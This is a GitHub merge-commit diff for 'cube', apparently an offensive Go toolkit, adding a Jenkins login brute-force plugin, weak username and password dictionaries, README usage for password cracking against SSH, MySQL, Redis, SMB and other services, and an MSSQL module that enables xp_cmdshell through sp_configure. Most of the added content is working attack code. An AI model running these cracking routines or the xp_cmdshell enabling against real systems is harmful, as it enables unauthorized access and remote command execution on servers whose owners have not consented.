Merge branch 'dev'

add crack jenkins plugin
JKme · Jul 19, 2021 · 2268a84 · 2268a84
2 parents be81d62 + cc4b971
commit 2268a84
Show file tree

Hide file tree

Showing 7 changed files with 155 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -32,10 +32,11 @@ cube probe -x ALL -i 192.168.2.1/24
 
 #### TODO
 - [ ] NTLM SSP信息收集扫描
+  https://www.mi1k7ea.com/2021/02/24/%E6%8E%A2%E6%B5%8B%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA/
 
 
 ### Crack
-爆破弱密码，可用插件：`ssh，mysql，redis，elastic，ftp，httpbasic，mongo，mssql，phpmyadmin，smb，postgres`
+爆破弱密码，可用插件：`ssh，mysql，redis，elastic，ftp，httpbasic，mongo，mssql，phpmyadmin，smb，postgres, jenkins`
 
 ```
 Examples:
@@ -49,6 +50,7 @@ cube crack -u root --pass-file pass.txt -i 192.168.1.1/24 -x ssh,mysql
 phpmyadmin和httpbasic只能单独使用，不可组合:
 cube crack -u root --pass-file pass.txt -i http://192.168.1.1 -x phpmyadmin
 cube crack -u root --pass-file pass.txt -i http://192.168.1.1 -x httpbasic
+cube crack -u root --pass-file pass.txt -i http://192.168.1.1 -x jenkins
 ```
 
 sqlserver爆破密码的代码(Event Code): 18456

diff --git a/cubelib/crackTask.go b/cubelib/crackTask.go
@@ -210,7 +210,7 @@ func StartCrackTask(opt *model.CrackOptions, globalopts *model.GlobalOptions) {
 		taskChan <- task
 	}
 	//wg.Wait()
-	waitTimeout(&wg, model.ThreadTimeout)
+	waitTimeout(&wg, model.ThreadTimeout*2)
 	ReadResultMap()
 	getFinishTime(t1)
 }
diff --git a/model/vars.go b/model/vars.go
@@ -27,6 +27,7 @@ var UserDict = map[string][]string{
 	"phpmyadmin": {"root"},
 	"httpbasic":  {"root", "admin", "tomcat", "test", "guest"}, //activemq、tomcat、nexus
 	"elastic":    {""},
+	"jenkins":    {"jenkins", "admin"},
 }
 
 var PassDict = []string{"", "123456", "admin", "admin123", "root", "5201314", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}12", "{user}111", "{user}123", "{user}1234", "{user}12345", "{user}123456", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "1QAZ2wsx", "1q2w3e4r", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "123456a", "123456aa", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", ""}

diff --git a/plugins/crack/jenkins.go b/plugins/crack/jenkins.go
@@ -0,0 +1,78 @@
+package crack
+
+import (
+	"bufio"
+	"cube/model"
+	"fmt"
+	"net/http"
+	"net/http/cookiejar"
+	"net/url"
+	"regexp"
+	"strings"
+)
+
+func JenkinsCrack(task model.CrackTask) (result model.CrackTaskResult) {
+	result = model.CrackTaskResult{CrackTask: task, Result: "", Err: nil}
+
+	clt := http.Client{}
+	req, _ := http.NewRequest("GET", task.Ip+"/login", nil)
+	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	req.Header.Add("Connection", "close")
+	req.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
+	req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
+	resp, err := clt.Do(req)
+	if err != nil {
+		panic(err)
+	}
+
+	data := make([]byte, 20250)
+	c := bufio.NewReader(resp.Body)
+	c.Read(data)
+	resp.Body.Close()
+	//content, _ := ioutil.ReadAll(resp.Body)
+
+	r := regexp.MustCompile(`(?U)action="(.*)"`)
+	match := r.FindStringSubmatch(string(data))
+	if match == nil {
+		return
+	}
+	postUri := strings.TrimSpace(match[1])
+	//fmt.Println(postUri)
+
+	//clt2 := http.Client{
+	//	CheckRedirect: func(req *http.Request, via []*http.Request) error {
+	//		return http.ErrUseLastResponse
+	//	},
+	//}
+
+	jar, _ := cookiejar.New(nil)
+	host, _ := url.Parse(task.Ip)
+	jar.SetCookies(host, resp.Cookies())
+	clt2 := http.Client{
+		Jar: jar,
+	}
+	urlValues := url.Values{}
+	urlValues.Add("j_username", task.Auth.User)
+	urlValues.Add("j_password", task.Auth.Password)
+	body := strings.NewReader(urlValues.Encode())
+	req2, _ := http.NewRequest("POST", task.Ip+"/"+postUri, body)
+	req2.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	req2.Header.Add("Connection", "close")
+	req2.Header.Add("Accept-Charset", "utf-8")
+	req2.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+
+	r2, err := clt2.Do(req2)
+	if err != nil {
+		panic(err)
+	}
+	defer r2.Body.Close()
+	data2 := make([]byte, 10480)
+	c2 := bufio.NewReader(r2.Body)
+	c2.Read(data2)
+	//fmt.Println(string(data2))
+	//fmt.Print(r2.Header["Set-Cookie"])
+	if strings.Contains(string(data2), "Dashboard") {
+		result.Result = fmt.Sprintf("User: %s \t Password: %s", task.Auth.User, task.Auth.Password)
+	}
+	return result
+}
diff --git a/plugins/crack/mysql_test.go b/plugins/crack/mysql_test.go
@@ -129,4 +129,18 @@ func TestMssqlCrack(t *testing.T) {
 	}
 	r := MssqlCrack(task)
 	fmt.Println(r)
-}
+}
+
+func TestJenkinsCrack(t *testing.T) {
+	task := model.CrackTask{
+		Ip: "http://127.0.0.1:8081",
+		//Port: "1433",
+		Auth: model.Auth{
+			User:     "admin",
+			Password: "123456",
+		},
+		CrackPlugin: "jenkins",
+	}
+	r := JenkinsCrack(task)
+	fmt.Println(r)
+}
diff --git a/plugins/plugins.go b/plugins/plugins.go
@@ -55,8 +55,9 @@ func init() {
 	CrackFuncMap["mssql"] = crack.MssqlCrack
 	CrackFuncMap["phpmyadmin"] = crack.PhpmyadminCrack
 	CrackFuncMap["httpbasic"] = crack.HttpBasicCrack
+	CrackFuncMap["jenkins"] = crack.JenkinsCrack
 
-	CrackFuncExclude = []string{"phpmyadmin", "httpbasic"} //去除phpmyadmin这类单独使用的
+	CrackFuncExclude = []string{"phpmyadmin", "httpbasic", "jenkins"} //去除phpmyadmin这类单独使用的
 
 	for k := range CrackFuncMap {
 		if !util.SliceContain(k, CrackFuncExclude) {

diff --git a/plugins/sqlcmd/mssql.go b/plugins/sqlcmd/mssql.go
@@ -0,0 +1,55 @@
+package sqlcmd
+
+import (
+	"cube/log"
+	"cube/model"
+	"database/sql"
+	"fmt"
+	_ "github.com/denisenkom/go-mssqldb"
+)
+
+func Mssql1Cmd(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
+	result = model.SqlcmdTaskResult{SqlcmdTask: task, Result: "", Err: nil}
+
+	dataSourceName := fmt.Sprintf("server=%v;port=%v;user id=%v;password=%v;database=%v", task.Ip,
+		task.Port, task.User, task.Password, "tempdb")
+	db, err := sql.Open("mssql", dataSourceName)
+	defer db.Close()
+	if err != nil {
+		log.Errorf("Open connection failed:", err.Error())
+	}
+	return result
+}
+
+func Open(conn sql.DB) {
+	value, err := conn.Prepare("select value_in_use from   sys.configurations where  name = 'xp_cmdshell'")
+	if err != nil {
+		log.Errorf("Prepare failed:", err.Error())
+	}
+	defer value.Close()
+
+	row := value.QueryRow()
+	//var somenumber int64
+	var v int
+	err = row.Scan(&v)
+	if err != nil {
+		log.Errorf("Query failed:", err.Error())
+	}
+	if v == 1 {
+		fmt.Printf("xp_cmdshell Enabled\n")
+
+	} else {
+		fmt.Printf("Open xp_cmdshell...\n")
+		stmt, err := conn.Prepare("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
+		if err != nil {
+			//fmt.Println("Query Error", err)
+			return
+		}
+
+		defer stmt.Close()
+		stmt.Query()
+
+	}
+	return
+
+}